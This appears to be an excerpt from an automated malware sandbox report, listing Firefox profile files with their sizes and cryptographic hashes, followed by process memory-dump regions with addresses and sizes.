                                        6fc58a6af515946cf6950cc9fff3cb858451bff9e44f2dd47bc1d53e46c1e9b2497d1f2b5a4fcd075155dc02771d032e1641511866b051df4b17982546b4a646

                                        Download Submit

                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\sessionstore-backups\recovery.baklz4
                                        Filesize

                                        4KB

                                        MD5

                                        33b8d088ccccc7f0a3bf14c9b583542a

                                        SHA1

                                        b83303102ffceeecd3475fccc4527d8f8d1a447e

                                        SHA256

                                        d07fdac7df75564e010919ef616faf70233773413af784280b702731cf1c83a0

                                        SHA512

                                        97175a43beb950bb63d7491e8a9c77f53d7b70df9bd390313348ce0a250c5de6d1c131283d62c9227103f4b1c6d72c49c9944a1f79848f65b873dab295c15d85

                                        Download Submit

                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\sessionstore-backups\recovery.jsonlz4
                                        Filesize

                                        4KB

                                        MD5

                                        67b06830272f9c63e67f09ff0150602e

                                        SHA1

                                        13e39d0afe4f63db923fa50da1e752024cd2bcbc

                                        SHA256

                                        07a1a29cde4e5dbc7f7a12100a6e4d42a7ce615fdbbe2949e6d63b28e67dd186

                                        SHA512

                                        3697c1635d64f2e70587821ccf39761c9224bec8a672ea55dd1c32ad1cd520e9cee6aa147294315f1ab531bbcfcdb280db7eaf1240f34d3964bb3eab174ef386

                                        Download Submit

                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                        Filesize

                                        2.3MB

                                        MD5

                                        86a2c4b28f9c416b0fa08e9b5223f100

                                        SHA1

                                        3f7678bd3c37785ed0be21bedd2b6777007bbd3d

                                        SHA256

                                        09f10fa472625cb0e4818f954a2c7fa3a9718315c95aca539b55f3b834656e0a

                                        SHA512

                                        af7eb72bb830aa519d456db93c1636d0b3d8b72cd535c96e78f756523507bd3a637a082172db7070b2288bebc080c5e2f77d500eab756cb2416bb9871b5a148a

                                        Download Submit

                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                        Filesize

                                        3.3MB

                                        MD5

                                        01046b4d84d5091586aee57b0724b9e6

                                        SHA1

                                        6f0c7b6795709b4835fb6b719f5939dde316e6cd

                                        SHA256

                                        09086f9f70acceebc833ed78ec83d63a5a909e0cb1af774a935bed77227244ce

                                        SHA512

                                        e9d8945aced888b0f7fea7b3d6a068cebd44b8f8de6d056a5a67d44e7754cbfba6b45b5780a94e5b7540dca295a7161902d4d3b43b844eb3950351be4b326f86

                                        Download Submit

                                      • memory/316-132-0x00000000074F0000-0x0000000007B6A000-memory.dmp

                                        Filesize

                                        6.5MB

                                        Download

                                      • memory/316-112-0x0000000004D70000-0x0000000005398000-memory.dmp

                                        Filesize

                                        6.2MB

                                        Download

                                      • memory/316-127-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

                                        Filesize

                                        120KB

                                        Download

                                      • memory/316-128-0x0000000005C10000-0x0000000005C5C000-memory.dmp

                                        Filesize

                                        304KB

                                        Download

                                      • memory/316-133-0x00000000060F0000-0x000000000610A000-memory.dmp

                                        Filesize

                                        104KB

                                        Download

                                      • memory/316-152-0x00000000070D0000-0x0000000007166000-memory.dmp

                                        Filesize

                                        600KB

                                        Download

                                      • memory/316-115-0x0000000005580000-0x00000000055E6000-memory.dmp

                                        Filesize

                                        408KB

                                        Download

                                      • memory/316-111-0x0000000002610000-0x0000000002646000-memory.dmp

                                        Filesize

                                        216KB

                                        Download

                                      • memory/316-155-0x0000000008120000-0x00000000086C4000-memory.dmp

                                        Filesize

                                        5.6MB

                                        Download

                                      • memory/316-114-0x0000000005510000-0x0000000005576000-memory.dmp

                                        Filesize

                                        408KB

                                        Download

                                      • memory/316-153-0x0000000007030000-0x0000000007052000-memory.dmp

                                        Filesize

                                        136KB

                                        Download

                                      • memory/316-125-0x00000000055F0000-0x0000000005944000-memory.dmp

                                        Filesize

                                        3.3MB

                                        Download

                                      • memory/316-113-0x0000000004B10000-0x0000000004B32000-memory.dmp

                                        Filesize

                                        136KB

                                        Download

                                      • memory/1100-1577-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1100-635-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1100-131-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1100-33-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1100-110-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1100-522-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1100-1466-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1100-1841-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1100-1519-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1100-1917-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1200-1495-0x0000000000680000-0x0000000000AC6000-memory.dmp

                                        Filesize

                                        4.3MB

                                        Download

                                      • memory/1200-1505-0x0000000000680000-0x0000000000AC6000-memory.dmp

                                        Filesize

                                        4.3MB

                                        Download

                                      • memory/1200-1342-0x0000000000680000-0x0000000000AC6000-memory.dmp

                                        Filesize

                                        4.3MB

                                        Download

                                      • memory/1200-1413-0x0000000000680000-0x0000000000AC6000-memory.dmp

                                        Filesize

                                        4.3MB

                                        Download

                                      • memory/1200-1918-0x00007FF9CDE90000-0x00007FF9CE085000-memory.dmp

                                        Filesize

                                        2.0MB

                                        Download

                                      • memory/1200-1412-0x0000000000680000-0x0000000000AC6000-memory.dmp

                                        Filesize

                                        4.3MB

                                        Download

                                      • memory/1256-612-0x00000000002E0000-0x000000000077B000-memory.dmp

                                        Filesize

                                        4.6MB

                                        Download

                                      • memory/1256-574-0x00000000002E0000-0x000000000077B000-memory.dmp

                                        Filesize

                                        4.6MB

                                        Download

                                      • memory/1832-592-0x0000000000910000-0x0000000000DC4000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/1832-590-0x0000000000910000-0x0000000000DC4000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/2684-223-0x0000000006130000-0x0000000006484000-memory.dmp

                                        Filesize

                                        3.3MB

                                        Download

                                      • memory/3024-343-0x00000000005C0000-0x0000000000A73000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/3024-498-0x00000000005C0000-0x0000000000A73000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/3284-1867-0x00007FF9B0540000-0x00007FF9B06B2000-memory.dmp

                                        Filesize

                                        1.4MB

                                        Download

                                      • memory/3284-1910-0x00007FF9B0540000-0x00007FF9B06B2000-memory.dmp

                                        Filesize

                                        1.4MB

                                        Download

                                      • memory/3284-1874-0x00007FF9B0540000-0x00007FF9B06B2000-memory.dmp

                                        Filesize

                                        1.4MB

                                        Download

                                      • memory/3284-1861-0x0000000000400000-0x0000000000DC6000-memory.dmp

                                        Filesize

                                        9.8MB

                                        Download

                                      • memory/3800-610-0x0000000000AC0000-0x0000000001146000-memory.dmp

                                        Filesize

                                        6.5MB

                                        Download

                                      • memory/3800-653-0x0000000000AC0000-0x0000000001146000-memory.dmp

                                        Filesize

                                        6.5MB

                                        Download

                                      • memory/4176-1885-0x00007FF9CDE90000-0x00007FF9CE085000-memory.dmp

                                        Filesize

                                        2.0MB

                                        Download

                                      • memory/4176-1884-0x0000000073490000-0x000000007360B000-memory.dmp

                                        Filesize

                                        1.5MB

                                        Download

                                      • memory/4476-1493-0x0000000000140000-0x00000000005CE000-memory.dmp

                                        Filesize

                                        4.6MB

                                        Download

                                      • memory/4476-1494-0x0000000000140000-0x00000000005CE000-memory.dmp

                                        Filesize

                                        4.6MB

                                        Download

                                      • memory/4600-37-0x0000000000BE0000-0x000000000108F000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/4600-38-0x0000000000BE0000-0x000000000108F000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/4644-177-0x00000000062C0000-0x0000000006614000-memory.dmp

                                        Filesize

                                        3.3MB

                                        Download

                                      • memory/4644-181-0x0000000006D00000-0x0000000006D4C000-memory.dmp

                                        Filesize

                                        304KB

                                        Download

                                      • memory/4696-500-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/4696-481-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/4836-634-0x0000000000280000-0x0000000000921000-memory.dmp

                                        Filesize

                                        6.6MB

                                        Download

                                      • memory/4836-42-0x0000000000280000-0x0000000000921000-memory.dmp

                                        Filesize

                                        6.6MB

                                        Download

                                      • memory/4836-43-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                        Filesize

                                        972KB

                                        Download

                                      • memory/4836-581-0x0000000000280000-0x0000000000921000-memory.dmp

                                        Filesize

                                        6.6MB

                                        Download

                                      • memory/4836-150-0x0000000000280000-0x0000000000921000-memory.dmp

                                        Filesize

                                        6.6MB

                                        Download

                                      • memory/4920-1941-0x0000000140000000-0x00000001400D0000-memory.dmp

                                        Filesize

                                        832KB

                                        Download

                                      • memory/4920-1959-0x0000000002F10000-0x000000000341E000-memory.dmp

                                        Filesize

                                        5.1MB

                                        Download

                                      • memory/4920-1958-0x0000000140000000-0x00000001400D0000-memory.dmp

                                        Filesize

                                        832KB

                                        Download

                                      • memory/4920-1944-0x0000000002F10000-0x000000000341E000-memory.dmp

                                        Filesize

                                        5.1MB

                                        Download

                                      • memory/4920-1943-0x0000000002F10000-0x000000000341E000-memory.dmp

                                        Filesize

                                        5.1MB

                                        Download

                                      • memory/5016-16-0x00000000004D1000-0x000000000053D000-memory.dmp

                                        Filesize

                                        432KB

                                        Download

                                      • memory/5016-15-0x0000000077CD4000-0x0000000077CD6000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/5016-14-0x00000000004D0000-0x0000000000980000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/5016-32-0x00000000004D0000-0x0000000000980000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/5016-31-0x00000000004D1000-0x000000000053D000-memory.dmp

                                        Filesize

                                        432KB

                                        Download

                                      • memory/5016-17-0x00000000004D0000-0x0000000000980000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/5016-19-0x00000000004D0000-0x0000000000980000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/5304-1893-0x0000000073490000-0x000000007360B000-memory.dmp

                                        Filesize

                                        1.5MB

                                        Download

                                      • memory/5304-1894-0x00007FF9CDE90000-0x00007FF9CE085000-memory.dmp

                                        Filesize

                                        2.0MB

                                        Download

                                      • memory/5304-1912-0x0000000073490000-0x000000007360B000-memory.dmp

                                        Filesize

                                        1.5MB

                                        Download

                                      • memory/5400-179-0x00000000003F0000-0x00000000008A4000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/5400-163-0x00000000003F0000-0x00000000008A4000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/5484-494-0x00000000067A0000-0x00000000067EC000-memory.dmp

                                        Filesize

                                        304KB

                                        Download

                                      • memory/6204-1579-0x0000000000AC0000-0x00000000014C9000-memory.dmp

                                        Filesize

                                        10.0MB

                                        Download

                                      • memory/6204-1594-0x0000000000AC0000-0x00000000014C9000-memory.dmp

                                        Filesize

                                        10.0MB

                                        Download

                                      • memory/6204-1521-0x0000000000AC0000-0x00000000014C9000-memory.dmp

                                        Filesize

                                        10.0MB

                                        Download

                                      • memory/6204-1578-0x0000000000AC0000-0x00000000014C9000-memory.dmp

                                        Filesize

                                        10.0MB

                                        Download

                                      • memory/6504-1556-0x0000000000400000-0x0000000000463000-memory.dmp

                                        Filesize

                                        396KB

                                        Download

                                      • memory/6504-1554-0x0000000000400000-0x0000000000463000-memory.dmp

                                        Filesize

                                        396KB

                                        Download

                                      • memory/6592-1915-0x0000000000650000-0x0000000000B00000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/6860-1589-0x0000000000400000-0x000000000042F000-memory.dmp

                                        Filesize

                                        188KB

                                        Download

                                      • memory/6860-1593-0x0000000000400000-0x000000000042F000-memory.dmp

                                        Filesize

                                        188KB

                                        Download

                                      • memory/6860-1598-0x0000000010000000-0x000000001001C000-memory.dmp

                                        Filesize

                                        112KB

                                        Download

                                      • memory/6860-1591-0x0000000000400000-0x000000000042F000-memory.dmp

                                        Filesize

                                        188KB

                                        Download

                                      • memory/7084-1972-0x0000000000E20000-0x00000000012D4000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/7084-1984-0x0000000000E20000-0x00000000012D4000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download